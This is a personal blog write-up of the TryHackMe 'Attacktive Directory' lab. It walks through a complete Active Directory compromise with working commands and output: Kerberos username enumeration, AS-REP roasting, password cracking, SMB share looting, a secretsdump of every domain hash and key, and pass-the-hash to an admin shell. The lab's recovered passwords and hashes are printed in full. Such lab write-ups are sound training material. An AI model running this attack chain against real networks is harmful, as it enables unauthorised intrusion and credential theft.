Attacktive Directory ~ Try Hack Me
Finally completed my CEH Master certification and found myself lazing around so here we go :)
I SUCK AT WINDOWS EXPLOITATION ~ Nee
Prerequisite
Just to make life easier I usually add an entry in my hosts file for easier access of the target machine.
echo "10.10.117.127 tar.get" >> /etc/hosts
Okay now onto hacking!
Reconnaissance
As always, I fired off an NMAP scan against the target machine.
┌──(nee㉿kali)-[~]
└─$ nmap -Pn -sV -sC -p- -A tar.get Nmap scan report for tar.get (10.10.117.127)
Host is up (0.35s latency).
Not shown: 65508 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-10-05 08:45:57Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2020-10-05T08:48:26+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2020-10-04T08:35:54
|_Not valid after: 2021-04-05T08:35:54
|_ssl-date: 2020-10-05T08:48:41+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49689/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
49788/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=10/5%Time=5F7ADD4A%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-10-05T08:48:27
|_ start_date: N/AMost of the open ports and running services led me to believe that this was indeed a windows server.
- DNS
- Active Directory LDAP
- SMB / RPC
- RDP
Bruteforcing credentials
I was given 2 files that aided with the brute force attack.
I made use of a tool named kerbrute to perform the attack
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ ./kerbrute_linux_amd64 userenum -d spookysec.local --dc 10.10.156.245 userlist.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 10/06/20 - Ronnie Flathers @ropnop
2020/10/06 04:49:07 > Using KDC(s):
2020/10/06 04:49:07 > 10.10.156.245:88
2020/10/06 04:49:08 > [+] VALID USERNAME: [email protected]
2020/10/06 04:49:14 > [+] VALID USERNAME: [email protected]
2020/10/06 04:49:22 > [+] VALID USERNAME: [email protected]
2020/10/06 04:49:24 > [+] VALID USERNAME: [email protected]
2020/10/06 04:49:54 > [+] VALID USERNAME: [email protected]
2020/10/06 04:50:13 > [+] VALID USERNAME: [email protected]
2020/10/06 04:50:50 > [+] VALID USERNAME: [email protected]
2020/10/06 04:51:07 > [+] VALID USERNAME: [email protected]
2020/10/06 04:52:58 > [+] VALID USERNAME: [email protected]
2020/10/06 04:53:36 > [+] VALID USERNAME: [email protected]
I was able to find out crucial usernames through these attacks. I found out that there were accounts such as:
- svc-admin
- administrator
- backup
I could possibly use one of these accounts to get into the machine.
Exploiting Kerberos
The exploit that was used for this is called ASREPRoasting. I recently learnt about Kerberoasting and it was very similar to this exploit. The only difference between Kerberoasting and ASREPRoasting is that ASREPRoasting occurs when a user account has the privilege Does not require Pre-Authentication set. This technically means that the accounts does not need to provide valid identidication before requesting a kerberos ticket.
I performed this exploit with the use of Impacket. (Impacket/Examples/GetNPUsers.py)
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ GetNPUsers.py spookysec.local/svc-admin -no-pass
Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for svc-admin
[email protected]:80f4807ece8bed030287d392722808dd$148464892db58fe257006835567004e0f3f2a856a4608a1cbce3d858251acfe7c41cf80c1d7ec54b0edad691871910c17564afd893c2cc534e88ab8b6b873e4eee228fcf947ede842452747e0fbdaf55ab1c475cceed283d48ddc5aa604ed8ee8ed8727b3b62f77f634c6e09ff719a53246356edef39f2fb8084b014c1fce8478079a956ce5384d5d1d7121b7173297e8a84e3c4914fd7c6d6618a9221cf3c96280c6ddea7f0ddba1541583bbbfc92b57fc1bd22011a7fd70477c6fd8daccc5d0cd88973a5c0607430e652113642a6de607617dd6866568fcad894ab9364902fd1c7670a7dfa1977ae02d62ff1c2593b35e0I was presented with the asrep hash for the user account. Moving on, I had to just crack it with john and retrieve the password for that particular account. This is where the wordlist I was given at the begining came in handy!
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ sudo john hash.txt --wordlist=passwordlist.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
management2005 ([email protected])
1g 0:00:00:00 DONE (2020-10-06 05:15) 100.0g/s 665600p/s 665600c/s 665600C/s horoscope..amy123
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Upon completion I got the password management2005 for the user account [email protected]
Connecting to shares via admin account
Now that I had both the username and the password I used SMBClient to connect to the file shares that the machine offered.
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ smbclient -L spookysec.local -U svc-admin
Enter WORKGROUP\svc-admin's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server shareNow that I had verified that I could access the shares, I tried accessing the backup folder
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ smbclient \\\\10.10.156.245\\backup -U svc-admin 1 ⨯
Enter WORKGROUP\svc-admin's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Apr 4 15:08:39 2020
.. D 0 Sat Apr 4 15:08:39 2020
backup_credentials.txt A 48 Sat Apr 4 15:08:53 2020
8247551 blocks of size 4096. 5269051 blocks available
smb: \>
I was able to successfully connect to the share and noticed a file names backup_credentials.txt. I proceeded to download the file to my local machine and realized that it was base64 encoded.
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> ^C
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ ls 130 ⨯
backup_credentials.txt hash.txt kerbrute_linux_amd64 passwordlist.txt userlist.txt
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ cat backup_credentials.txt
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw After decoding it, I realized that I got credentials to the backup account found couple steps ago.
Dumping hashes
Using the credentials I recovered from the previous step, I used Impacket again (but a different module) to dump all user account NTLM hashes & Kerberos keys.
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ secretsdump.py spookysec.local/backup:'backup2517860'
Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: [Errno Connection error (spookysec.local/backup:backup2517860:445)] [Errno -2] Name or service not known
[*] Cleaning up...
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ secretsdump.py spookysec.local/backup:'backup2517860'@10.10.156.245 -just-dc
Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e4876a80a723612986d7609aa5ebc12b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:8bc3bdcaf0f70c78b7bda16b84032f51:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:c431e7e3555aeb5b63cbdfee3024d56f4b7f10eaba6c3f94d9a1524e76a26a49
Administrator:aes128-cts-hmac-sha1-96:f955ac2d89620b2a8dcd9837105445ff
Administrator:des-cbc-md5:6d5edfa173d9d6ae
krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
krbtgt:des-cbc-md5:b94f97e97fabbf5d
spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f
spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064
spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9
spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054
spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
spookysec.local\darkstar:des-cbc-md5:758af4d061381cea
spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a
spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64
spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
spookysec.local\paradox:des-cbc-md5:83988983f8b34019
spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86
spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157
spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d
spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89
ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:7403d3da9fbb21788d7ded46cfa217a336d219376bf22d5f4ae0bba232e91f06
ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:1092c7b99ff5efd56ed960531d76647b
ATTACKTIVEDIREC$:des-cbc-md5:d69de55e08c4a845
[*] Cleaning up...Accessing administrator account of the machine
Lastly, I made use of psexec to perform something called "passing-the-hash" and get into the admin account.
┌──(nee㉿kali)-[~/boxes/thm/attactive]
└─$ psexec.py [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:e4876a80a723612986d7609aa5ebc12b
Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.156.245.....
[*] Found writable share ADMIN$
[*] Uploading file xLRsIsYU.exe
[*] Opening SVCManager on 10.10.156.245.....
[*] Creating service dfyb on 10.10.156.245.....
[*] Starting service dfyb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
And...I'm in.
That's the end of that box 😩. One of my first windows boxes! But turned out to be not too bad I guess :)
